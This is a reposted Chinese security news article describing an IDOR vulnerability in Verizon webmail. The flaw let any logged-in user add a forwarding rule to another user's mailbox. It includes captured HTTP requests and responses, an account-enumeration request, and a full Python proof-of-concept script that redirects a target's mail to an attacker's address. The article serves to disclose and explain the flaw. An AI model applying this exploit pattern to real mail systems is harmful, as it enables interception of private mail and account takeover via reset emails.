转载

Verizon邮箱现奇葩逻辑漏洞，个人邮件可被转发到任意邮箱

Verizon是美国三大电信巨头之一。最近Verizon 的安全人员发现Verizon 的邮箱系统存在一个高危漏洞，可以导致Verizon 邮箱用户的邮件被任意转发到其它邮箱账户。

下面这张截图是 Verizon邮箱的一个设置界面，其功能是为用户把他们的Verizon邮箱收到的邮件推送到另外一个邮箱账户。其过程就好比是一封邮件发送到了一个 Verizon邮箱，随后这个 Verizon邮箱又把这封邮件推送到用户设置的另外一个邮箱。

Verizon邮箱设置界面

这名安全研究人员先在本地开启了代理，随后开始抓取数据包。他先模拟正常用户的操作，并且设置了一个推送邮箱。随后抓取发送请求的数据包。在下方数据包代码内，我们可以看到这个是一个很正常的POST数据包，但是在userID可能会存在一个IDOR（Insecure Direct Object References）漏洞，因为直接引用对象是很不安全的。

POST https://mail.verizon.com/webmail/driver?nimlet=ispemailsettings&method=addForward HTTP/1.1 Host: mail.verizon.com Connection: keep-alive Content-Length: 169 Pragma: no-cache Cache-Control: no-cache Origin: https://mail.verizon.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: ***REMOVED***   sourceID=&auth=&auditID=&serviceName=MPSMail&userID=vze***REMOVED***%40verizon.net&forwardAddress=***REMOVED***%2Bverizon%40gm

然后下方是返还回来的数据包

{  "res": {   "Response": {    "DataOut": {     "User": {      "ID": "vze***REMOVED***",      "ForwardAddress": "***REMOVED***+verizon@gmail.com"     }    },    "xsi:noNamespaceSchemaLocation": "",    "xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",    "Errors": {     "Error": {      "Description": "",      "Severity": "Success",      "Type": "",      "Number": "0"     }    },    "Control": {     "Source": {      "ID": "",      "Auth": "",      "AuditID": ""     },     "Service": {      "Name": "MPSMail",      "Action": "AddForward"     }    }   }  } }

Verizon员工的邮箱大部分都是公布在互联网上的，比如客服邮箱，售后邮箱等，并且他们还有专门公开了一个API接口来查看哪些邮箱被注册过。下方数据包就是一个发送请求的数据包，可以让黑客采取枚举的方式获得大部分Verizon的邮箱账号。

Host: mail.verizon.com Connection: keep-alive Content-Length: 28 Pragma: no-cache Cache-Control: no-cache Origin: https://mail.verizon.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: ***REMOVED***   &alias=***REMOVED***@verizon.net

返还数据包

{  "res": [{   "alias": "***REMOVED***@verizon.net",   "mailID": "vze***REMOVED***@verizon.net"  }] }

假设有一个黑客，他把推送通知数据包里的 userID参数更改为其他人的邮箱。那么当那个人收到其他人的邮件时也会推送到黑客自己的设置的一个邮箱内，比如Facebook修改密码邮件，银行邮件等。为了引起Version内部的重视，这名员工还写了一个Python脚本来演示这个危害。

import urllib import requests from Cookie import SimpleCookie   """ A valid webmail login is required. Login to https://mail.verizon.com/ and paste in your Cookie header """ cookie_str = '***REMOVED***'     # Define target and forwarding address target_username = "***REMOVED***" forward_address = "***REMOVED***+verizontest@gmail.com"     def get_cookies(str):     cookie = SimpleCookie()     cookie.load(str)       cookies = {}     for key, morsel in cookie.items():         cookies[key] = morsel.value     return cookies     # Parse cookie string cookies = get_cookies(cookie_str)   # Setup session s = requests.Session() s.cookies.update(cookies)   # Get target user's mailID r = s.get("https://mail.verizon.com/webmail/driver?nimlet=mailidlookup&alias={}@verizon.net".format(target_username)) mail_id = r.json().get("res")[0].get("mailID")   # Set mail forwarder for target user params = {     "target": urllib.quote_plus(mail_id),     "forward": urllib.quote_plus(forward_address), }   url = "https://mail.verizon.com/webmail/driver?nimlet=ispemailsettings&method=addForward&sourceID=&auth=&auditID=" /       "&serviceName=MPSMail&userID={target}&forwardAddress={forward}" /       "&action=AddForward&ts=1460652842592&cmdSeq=1".format(**params)   r = s.get(url)   print(r.text.strip())